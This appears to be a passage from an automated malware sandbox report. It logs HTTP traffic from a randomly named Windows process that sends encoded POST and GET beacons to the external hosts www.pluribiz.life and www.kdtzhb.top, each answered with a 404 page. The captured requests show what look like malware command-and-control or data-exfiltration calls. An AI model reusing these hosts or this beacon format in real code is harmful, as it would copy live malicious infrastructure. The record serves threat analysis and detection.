                                                                        Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 [TRUNCATED]
                                                                        Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                        14 | 192.168.2.7 | 49855 | 209.74.64.58 | 80 | 3872 | C:\Program Files (x86)\QrvPXARBoEbtUsiaUykbcLKuPmcBzNKBOrZTpVsKIThgQdPcYEPVmeHBZztkAdHanzPhQdtNVWJ\rNgGAKxrFRkFYx.exe
                                                                        Timestamp | Bytes transferred | Direction | Data
                                                                        Nov 7, 2024 17:58:44.408447981 CET | 666 | OUT | POST /afcr/ HTTP/1.1
                                                                        Accept: */*
                                                                        Accept-Encoding: gzip, deflate
                                                                        Accept-Language: en-US,en;q=0.9
                                                                        Content-Type: application/x-www-form-urlencoded
                                                                        Content-Length: 235
                                                                        Cache-Control: max-age=0
                                                                        Connection: close
                                                                        Host: www.pluribiz.life
                                                                        Origin: http://www.pluribiz.life
                                                                        Referer: http://www.pluribiz.life/afcr/
                                                                        User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/33.0.1726.0 Safari/537.36
                                                                        Data Raw: 37 6a 3d 6b 7a 38 48 43 47 6a 41 57 74 6f 43 57 6d 6a 31 70 37 6e 37 31 6b 47 45 46 33 70 57 4f 36 34 4a 35 52 4d 36 6e 30 4d 47 53 37 66 6c 79 43 4b 6e 7a 36 42 61 33 52 30 57 61 4f 47 76 4c 69 4b 70 79 76 4f 4b 69 59 49 33 30 6e 52 56 69 69 4e 71 6e 49 72 66 49 52 50 68 37 43 6b 6a 4b 2b 55 2f 37 62 47 41 6c 77 46 52 4b 75 78 34 36 78 36 36 79 54 4e 73 38 6e 54 53 34 6e 4a 30 75 61 37 52 79 56 30 63 31 2b 64 63 49 33 4c 37 45 58 67 2b 34 5a 64 4e 7a 74 34 6e 47 58 48 79 64 6e 42 78 57 56 54 4a 6f 38 50 54 70 72 47 4c 4f 64 54 38 37 2f 48 5a 4b 69 7a 5a 54 45 6a 34 54 63 34 73 2f 4e 72 39 61 76 4a 52 71 71 74 45 59 32 61 5a 44 4d 34 6d 33 2f 37 42 4f 6f 53 35 2b 53 71 76 5a 33 2b 63 34 78 51 3d
                                                                        Data Ascii: 7j=kz8HCGjAWtoCWmj1p7n71kGEF3pWO64J5RM6n0MGS7flyCKnz6Ba3R0WaOGvLiKpyvOKiYI30nRViiNqnIrfIRPh7CkjK+U/7bGAlwFRKux46x66yTNs8nTS4nJ0ua7RyV0c1+dcI3L7EXg+4ZdNzt4nGXHydnBxWVTJo8PTprGLOdT87/HZKizZTEj4Tc4s/Nr9avJRqqtEY2aZDM4m3/7BOoS5+SqvZ3+c4xQ=
                                                                        Nov 7, 2024 17:58:45.071439028 CET | 533 | IN | HTTP/1.1 404 Not Found
                                                                        Date: Thu, 07 Nov 2024 16:58:44 GMT
                                                                        Server: Apache
                                                                        Content-Length: 389
                                                                        Connection: close
                                                                        Content-Type: text/html
                                                                        Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 [TRUNCATED]
                                                                        Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                        15 | 192.168.2.7 | 49856 | 209.74.64.58 | 80 | 3872 | C:\Program Files (x86)\QrvPXARBoEbtUsiaUykbcLKuPmcBzNKBOrZTpVsKIThgQdPcYEPVmeHBZztkAdHanzPhQdtNVWJ\rNgGAKxrFRkFYx.exe
                                                                        Timestamp | Bytes transferred | Direction | Data
                                                                        Nov 7, 2024 17:58:47.112903118 CET | 1679 | OUT | POST /afcr/ HTTP/1.1
                                                                        Accept: */*
                                                                        Accept-Encoding: gzip, deflate
                                                                        Accept-Language: en-US,en;q=0.9
                                                                        Content-Type: application/x-www-form-urlencoded
                                                                        Content-Length: 1247
                                                                        Cache-Control: max-age=0
                                                                        Connection: close
                                                                        Host: www.pluribiz.life
                                                                        Origin: http://www.pluribiz.life
                                                                        Referer: http://www.pluribiz.life/afcr/
                                                                        User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/33.0.1726.0 Safari/537.36
                                                                        Data Raw: 37 6a 3d 6b 7a 38 48 43 47 6a 41 57 74 6f 43 57 6d 6a 31 70 37 6e 37 31 6b 47 45 46 33 70 57 4f 36 34 4a 35 52 4d 36 6e 30 4d 47 53 39 48 6c 79 52 43 6e 70 64 56 61 32 52 30 57 5a 4f 47 69 4c 69 4c 31 79 72 69 52 69 59 4e 49 30 6c 70 56 7a 78 46 71 68 38 2f 66 43 52 50 68 2b 79 6b 33 48 65 55 71 37 62 32 45 6c 77 31 52 4b 75 78 34 36 33 2b 36 69 52 70 73 2b 6e 54 64 78 48 49 37 71 61 36 4f 79 56 74 6a 31 2f 4e 71 49 48 72 37 45 33 77 2b 36 71 6c 4e 2f 74 34 70 48 58 47 78 64 6e 4d 7a 57 52 7a 2f 6f 39 37 35 70 73 69 4c 4c 35 43 39 75 2b 7a 2b 64 42 48 6c 4e 6d 4c 4a 63 73 78 45 2b 4d 33 62 53 64 4e 7a 6e 4b 4e 34 41 55 79 46 4a 70 56 31 32 65 33 2b 56 4c 2b 53 32 55 54 51 63 57 75 66 36 45 52 70 69 48 62 7a 6d 61 57 44 65 5a 77 52 6c 48 35 30 48 69 4c 39 56 79 67 50 43 4f 69 57 54 5a 6f 66 73 33 44 57 31 74 68 4e 50 57 64 77 62 68 77 61 42 5a 46 51 39 4d 44 38 7a 53 6a 2b 64 59 49 4b 42 53 39 32 65 43 72 50 62 4e 6d 78 2f 46 2f 4b 49 4f 68 61 54 45 2f 31 53 51 31 78 39 77 59 30 32 64 4a 65 2f 6e 75 [TRUNCATED]
                                                                        Data Ascii: 7j=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 [TRUNCATED]
                                                                        Nov 7, 2024 17:58:47.721957922 CET | 533 | IN | HTTP/1.1 404 Not Found
                                                                        Date: Thu, 07 Nov 2024 16:58:47 GMT
                                                                        Server: Apache
                                                                        Content-Length: 389
                                                                        Connection: close
                                                                        Content-Type: text/html
                                                                        Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 [TRUNCATED]
                                                                        Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                        16 | 192.168.2.7 | 49857 | 209.74.64.58 | 80 | 3872 | C:\Program Files (x86)\QrvPXARBoEbtUsiaUykbcLKuPmcBzNKBOrZTpVsKIThgQdPcYEPVmeHBZztkAdHanzPhQdtNVWJ\rNgGAKxrFRkFYx.exe
                                                                        Timestamp | Bytes transferred | Direction | Data
                                                                        Nov 7, 2024 17:58:49.657613039 CET | 390 | OUT | GET /afcr/?7j=pxUnB3/JQIgHT0Xru4WA6nCBQFxpXJgMoApNpkZ5FdrdhyTQr+Z8vQ44Z+GGNzyuoe7kishsw1Bs9wd8tp/8BBfqyAxJMs0BkbyFlX94FNsmynKB1TNzikOc40xRpv+r7CBu5ZxKJnGu&UvgPX=o0HdzhbpI6gx HTTP/1.1
                                                                        Accept: */*
                                                                        Accept-Language: en-US,en;q=0.9
                                                                        Connection: close
                                                                        Host: www.pluribiz.life
                                                                        User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/33.0.1726.0 Safari/537.36
                                                                        Nov 7, 2024 17:58:50.336545944 CET | 548 | IN | HTTP/1.1 404 Not Found
                                                                        Date: Thu, 07 Nov 2024 16:58:50 GMT
                                                                        Server: Apache
                                                                        Content-Length: 389
                                                                        Connection: close
                                                                        Content-Type: text/html; charset=utf-8
                                                                        Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 [TRUNCATED]
                                                                        Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                        17 | 192.168.2.7 | 49858 | 47.242.89.146 | 80 | 3872 | C:\Program Files (x86)\QrvPXARBoEbtUsiaUykbcLKuPmcBzNKBOrZTpVsKIThgQdPcYEPVmeHBZztkAdHanzPhQdtNVWJ\rNgGAKxrFRkFYx.exe
                                                                        Timestamp | Bytes transferred | Direction | Data
                                                                        Nov 7, 2024 17:58:55.792196989 CET | 637 | OUT | POST /1iqa/ HTTP/1.1
                                                                        Accept: */*
                                                                        Accept-Encoding: gzip, deflate
                                                                        Accept-Language: en-US,en;q=0.9
                                                                        Content-Type: application/x-www-form-urlencoded
                                                                        Content-Length: 215
                                                                        Cache-Control: max-age=0
                                                                        Connection: close
                                                                        Host: www.kdtzhb.top
                                                                        Origin: http://www.kdtzhb.top
                                                                        Referer: http://www.kdtzhb.top/1iqa/
                                                                        User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/33.0.1726.0 Safari/537.36
                                                                        Data Raw: 37 6a 3d 4a 4b 77 4a 39 41 53 68 76 53 65 41 45 34 68 2f 39 37 2f 55 69 32 41 6a 57 33 35 45 33 36 36 45 36 71 39 4c 77 69 45 6d 51 53 59 4f 63 6c 4a 45 41 56 36 64 4a 6c 6c 6d 63 46 51 64 36 52 69 79 59 55 49 57 79 6e 54 34 4f 4f 70 46 56 52 6c 62 61 36 41 4e 2b 33 32 38 76 72 66 6d 73 57 53 34 34 61 46 67 39 74 6f 5a 59 75 44 78 50 75 4b 2f 57 61 4a 71 33 4c 33 7a 4b 58 57 32 59 4a 4f 58 4b 56 38 72 50 59 43 7a 45 44 4c 37 69 70 70 49 38 4f 63 4c 36 2f 59 4e 6f 42 56 55 7a 49 43 63 59 75 44 32 45 58 58 32 59 31 53 7a 67 69 6f 4b 70 39 42 44 55 43 42 55 39 57 69 55 72 66 74 78 63 38 78 6d 78 69 57 6d 6b 39 65 43 4a 58 59 42 66 67 3d 3d
                                                                        Data Ascii: 7j=JKwJ9AShvSeAE4h/97/Ui2AjW35E366E6q9LwiEmQSYOclJEAV6dJllmcFQd6RiyYUIWynT4OOpFVRlba6AN+328vrfmsWS44aFg9toZYuDxPuK/WaJq3L3zKXW2YJOXKV8rPYCzEDL7ippI8OcL6/YNoBVUzICcYuD2EXX2Y1SzgioKp9BDUCBU9WiUrftxc8xmxiWmk9eCJXYBfg==
                                                                        Nov 7, 2024 17:58:56.732330084 CET | 691 | IN | HTTP/1.1 404 Not Found
                                                                        Server: nginx
                                                                        Date: Thu, 07 Nov 2024 16:58:56 GMT
                                                                        Content-Type: text/html
                                                                        Content-Length: 548
                                                                        Connection: close
                                                                        Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 [TRUNCATED]
                                                                        Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


                                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                        18 | 192.168.2.7 | 49859 | 47.242.89.146 | 80 | 3872 | C:\Program Files (x86)\QrvPXARBoEbtUsiaUykbcLKuPmcBzNKBOrZTpVsKIThgQdPcYEPVmeHBZztkAdHanzPhQdtNVWJ\rNgGAKxrFRkFYx.exe
                                                                        Timestamp | Bytes transferred | Direction | Data
                                                                        Nov 7, 2024 17:58:58.330439091 CET | 657 | OUT | POST /1iqa/ HTTP/1.1
                                                                        Accept: */*
                                                                        Accept-Encoding: gzip, deflate
                                                                        Accept-Language: en-US,en;q=0.9
                                                                        Content-Type: application/x-www-form-urlencoded
                                                                        Content-Length: 235
                                                                        Cache-Control: max-age=0
                                                                        Connection: close
                                                                        Host: www.kdtzhb.top
                                                                        Origin: http://www.kdtzhb.top
                                                                        Referer: http://www.kdtzhb.top/1iqa/
                                                                        User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/33.0.1726.0 Safari/537.36
                                                                        Data Raw: 37 6a 3d 4a 4b 77 4a 39 41 53 68 76 53 65 41 47 5a 78 2f 75 49 58 55 6c 57 41 67 56 33 35 45 35 71 36 41 36 71 35 4c 77 6a 41 32 51 6b 49 4f 63 47 64 45 44 52 75 64 49 6c 6c 6d 58 6c 51 63 33 78 69 35 59 55 4e 72 79 6d 76 34 4f 4f 39 46 56 51 56 62 61 4a 6f 4d 73 33 32 2b 33 62 66 6b 68 32 53 34 34 61 46 67 39 73 4d 6a 59 75 62 78 4f 65 61 2f 58 35 52 70 37 72 33 30 43 33 57 32 53 70 4f 54 4b 56 39 2b 50 64 2f 6f 45 46 50 37 69 6f 5a 49 79 36 49 4d 76 50 59 4c 6e 68 55 72 33 36 54 74 57 4f 33 56 47 48 44 77 63 6c 32 74 6f 30 70 6f 7a 66 4e 76 4b 54 35 76 35 55 47 69 38 35 77 45 65 39 31 2b 38 41 69 48 37 4b 37 6f 45 46 35 46 4a 52 58 52 39 78 68 45 74 38 61 43 33 4c 76 57 33 43 72 4c 44 61 51 3d
                                                                        Data Ascii: 7j=JKwJ9AShvSeAGZx/uIXUlWAgV35E5q6A6q5LwjA2QkIOcGdEDRudIllmXlQc3xi5YUNrymv4OO9FVQVbaJoMs32+3bfkh2S44aFg9sMjYubxOea/X5Rp7r30C3W2SpOTKV9+Pd/oEFP7ioZIy6IMvPYLnhUr36TtWO3VGHDwcl2to0pozfNvKT5v5UGi85wEe91+8AiH7K7oEF5FJRXR9xhEt8aC3LvW3CrLDaQ=
                                                                        Nov 7, 2024 17:58:59.293710947 CET | 691 | IN | HTTP/1.1 404 Not Found
                                                                        Server: nginx
                                                                        Date: Thu, 07 Nov 2024 16:58:59 GMT
                                                                        Content-Type: text/html
                                                                        Content-Length: 548
                                                                        Connection: close
                                                                        Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 [TRUNCATED]
                                                                        Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


                                                                        Session ID: 19 | Source IP: 192.168.2.7 | Source Port: 49860 | Destination IP: 47.242.89.146 | Destination Port: 80 | PID: 3872 | Process: C:\Program Files (x86)\QrvPXARBoEbtUsiaUykbcLKuPmcBzNKBOrZTpVsKIThgQdPcYEPVmeHBZztkAdHanzPhQdtNVWJ\rNgGAKxrFRkFYx.exe
                                                                        Timestamp: Nov 7, 2024 17:59:00.878912926 CET | Bytes transferred: 1670 | Direction: OUT
                                                                        POST /1iqa/ HTTP/1.1
                                                                        Accept: */*
                                                                        Accept-Encoding: gzip, deflate
                                                                        Accept-Language: en-US,en;q=0.9
                                                                        Content-Type: application/x-www-form-urlencoded
                                                                        Content-Length: 1247
                                                                        Cache-Control: max-age=0
                                                                        Connection: close
                                                                        Host: www.kdtzhb.top
                                                                        Origin: http://www.kdtzhb.top
                                                                        Referer: http://www.kdtzhb.top/1iqa/
                                                                        User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/33.0.1726.0 Safari/537.36
                                                                        Data Ascii: 7j=JKwJ9AShvSeAGZx/uIXUlWAgV35E5q6A6q5LwjA2QkAOb0FEZzGdaVlmLVQZ3xieYQZvymjCONFFVyNbSYoMm32++7fpsWSX4a1k9t8jYubxOYe/QqJp9r3zKXWyYJP0KVluPcv4D1v7iLhIwJgMtvYJrBUz36f2WOrZGEfeciCt7BYDoOFuYDQ7+F2j6IUuUe4A3zWf5LWXNkIJGEucjDdnhNSs8v+lqxD+Uf9fOtUAk1A+y6VOLOv/0Bkqe3s5e63JDj/7SUEwotXITrlLNqmdtP4RJ07Rqw9rnH0cYs2NkNh23s+dZ0VJuQiJqOlUNr8dGhBQTap5L/AleWCYSCQkSLC2Snpofx3fO9lFuxclnF8FKgU7p8Q5+K7lwsp1UZ/XkAGOqHc+QBistn/lNoCoxDdRxV8kf+uR0UgsC30Kejn6xJBc6RkAwDhWS/vJhEmGC2N0h8K5MXwtvRZOyyvw8BWrU8Ar7WqQtkFp1A4wlNhQ+/Rk1uKPDkNyvmviBr1JoXu36lIgF4ErncQzSzXIyH+LVnkhtvFzDzdRpdqZ1iuUMSZze/Asy5q0tDz5y6iimIVOyptAOedAH/De6zRdaQ5T3p2xYaQ6c3Mki5juch5BPmXVEQk1bqK9DBJfGOn3IlQLTJPEt6JgE+b1eAN/OlLVDhsTElSxXZz8CnjZTBcPQssUodHEImFdx91ReQQEkboCxYMXFFPhJsjz/Vc5TNkRNXGn4WI4dILsARtPOYt4R4qFbxh3qPLI9hXX4ZqFDZCZKF1Ofx1fdxjUSdmyOoTZXNdWFJ0ZBK9QYrIihV+ZHLvIWqnzDvWPFFCU79RFliSJ6ew/t1NBZLuU9ArUpEpdFFxWsFLWCPphnWfP/Pqu4Vk9qJojX+B9mOMsiimZdRJPbpMGEAnrqKDTmQDZ1qDQc1kcicSzRfDc61Ef9g2xg3HSgVkFRrcIgKznayUZjXyzA8ikKjzhstFAD1VEAhA8+hPi3xLYtirapvk8HWc+z [TRUNCATED]
                                                                        Timestamp: Nov 7, 2024 17:59:01.803971052 CET | Bytes transferred: 691 | Direction: IN
                                                                        HTTP/1.1 404 Not Found
                                                                        Server: nginx
                                                                        Date: Thu, 07 Nov 2024 16:59:01 GMT
                                                                        Content-Type: text/html
                                                                        Content-Length: 548
                                                                        Connection: close
                                                                        Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


                                                                        Session ID: 20 | Source IP: 192.168.2.7 | Source Port: 49861 | Destination IP: 47.242.89.146 | Destination Port: 80 | PID: 3872 | Process: C:\Program Files (x86)\QrvPXARBoEbtUsiaUykbcLKuPmcBzNKBOrZTpVsKIThgQdPcYEPVmeHBZztkAdHanzPhQdtNVWJ\rNgGAKxrFRkFYx.exe
                                                                        Timestamp: Nov 7, 2024 17:59:03.424273968 CET | Bytes transferred: 387 | Direction: OUT
                                                                        GET /1iqa/?7j=EIYp+2qno3OyA6JRko7EkEQRXSdht8qBodEq6zBYd0MwR3tzbR3TIlddc30TsymXBRZ2l1bBHfxTXhxkRZRQgVC25Yrin2Sqkv5Fwdk+dvafD+ucZYRStKeuK1fTd52HaDhfGqTyDFD4&UvgPX=o0HdzhbpI6gx HTTP/1.1
                                                                        Accept: */*
                                                                        Accept-Language: en-US,en;q=0.9
                                                                        Connection: close
                                                                        Host: www.kdtzhb.top
                                                                        User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/33.0.1726.0 Safari/537.36
                                                                        Timestamp: Nov 7, 2024 17:59:04.377646923 CET | Bytes transferred: 691 | Direction: IN
                                                                        HTTP/1.1 404 Not Found
                                                                        Server: nginx
